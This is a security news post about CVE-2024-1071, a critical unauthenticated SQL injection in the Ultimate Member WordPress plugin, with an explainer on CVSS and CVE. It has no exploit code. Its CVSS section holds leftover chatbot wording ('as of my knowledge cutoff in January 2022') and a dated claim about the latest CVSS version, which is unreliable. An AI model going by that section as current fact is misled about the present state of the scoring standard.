CVE-2024-1071 WordPress Plugin Vulnerability

A significant security vulnerability has been revealed in Ultimate Member, a widely used WordPress plugin boasting over 200,000 active installations. Identified as CVE-2024-1071, this flaw has earned a high CVSS score of 9.8 out of 10 and was uncovered and reported by security researcher Christiaan Swiers. As detailed in a recent advisory by Wordfence, a WordPress security company, the plugin (versions 2.1.3 to 2.8.2) is susceptible to SQL Injection through the 'sorting' parameter due to inadequate escaping on user-supplied parameters and insufficient preparation on the existing SQL query.

This loophole could be exploited by unauthenticated attackers to insert additional SQL queries into the present queries, leading to the extraction of sensitive data from the database. It's crucial to note that this issue impacts users who have selected the "Enable custom table for usermeta" option in the plugin settings.

Upon responsible disclosure on January 30, 2024, the plugin developers promptly addressed the vulnerability by releasing version 2.8.3 on February 19. Users are strongly advised to update their plugins to the latest version promptly to minimize potential risks, especially considering Wordfence has already thwarted one attack attempting to exploit the flaw within the past 24 hours.

It's noteworthy that a similar vulnerability (CVE-2023-3460, CVSS score: 9.8) in the same plugin was actively abused by threat actors in July 2023. Exploiting this flaw enabled them to create unauthorized admin users and take control of vulnerable sites.

What is the Unified CVE Rating System for Vulnerabilities?

The Common Vulnerability Scoring System (CVSS) is a standardized scoring system used to assess and communicate the severity of vulnerabilities in software systems. It provides a common framework for organizations and individuals to evaluate the impact of security vulnerabilities. The CVSS is designed to be vendor-agnostic and is widely adopted in the cybersecurity community.

The CVSS assigns a numerical score to vulnerabilities based on various factors, including the exploitability of the vulnerability, the impact on the confidentiality, integrity, and availability of the affected system, and whether the vulnerability requires user interaction for exploitation. The scores range from 0 to 10, with higher scores indicating more severe vulnerabilities.

The CVSS has gone through several versions, and the latest version as of my knowledge cutoff in January 2022 is CVSSv3.1. It provides a more refined and accurate assessment of vulnerabilities compared to earlier versions.

The "Common Vulnerabilities and Exposures" (CVE) system, on the other hand, is a separate initiative that assigns unique identifiers, called CVE IDs, to publicly disclosed vulnerabilities. The CVE system doesn't provide severity scores on its own. Instead, it is often used in conjunction with the CVSS to uniquely identify and assess vulnerabilities.

By Zaib
February 29, 2024
Computer Security
English
February 29, 2024
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Microsoft Warns State-Backed Threat Actors Are Using AI in...

14 days ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

7 months ago

Trojan Al11 Malware Detection & Removal - An Essential...

11 months ago

Pinaview is a Fully-Featured Adware App

11 months ago

Paraboobs.xyz Attempts to Spam Push Notification Ads

4 months ago

Related Posts

Computer Security

WordPress Plugin Vulnerability Found on 80,000 Sites

Security researchers discovered a vulnerability in a relatively popular WordPress plugin used on commercial websites. The plugin in question is called Variation Swatches for WooCommerce and is found on approximately... Read more

December 2, 2021
Computer Security

Thousands of WordPress Sites Affected by Plugin Vulnerability

A new severe vulnerability has been discovered in yet another WordPress template. The flaw allows for code injection on the pages running the plugin, as well as phishing through cross-site scripting. It seems not a... Read more

January 24, 2022
Computer Security

Critical Vulnerability Found in WordPress E-Commerce Plugin Used by Over 30,000 Online Stores

It has been reported that the WordPress "Abandoned Cart Lite for WooCommerce" plugin, installed on more than 30,000 websites, has a critical security vulnerability. According to an advisory from Defiant's Wordfence,... Read more

June 23, 2023
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.